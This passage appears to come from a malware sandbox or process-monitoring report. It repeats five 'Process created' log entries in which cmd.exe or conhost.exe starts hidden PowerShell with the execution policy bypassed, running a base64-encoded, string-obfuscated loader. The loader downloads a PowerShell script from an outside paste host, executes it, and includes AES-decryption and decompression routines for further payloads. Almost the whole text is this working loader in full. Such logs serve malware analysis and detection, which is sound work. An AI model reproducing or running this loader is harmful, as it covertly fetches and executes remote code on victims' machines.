fdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
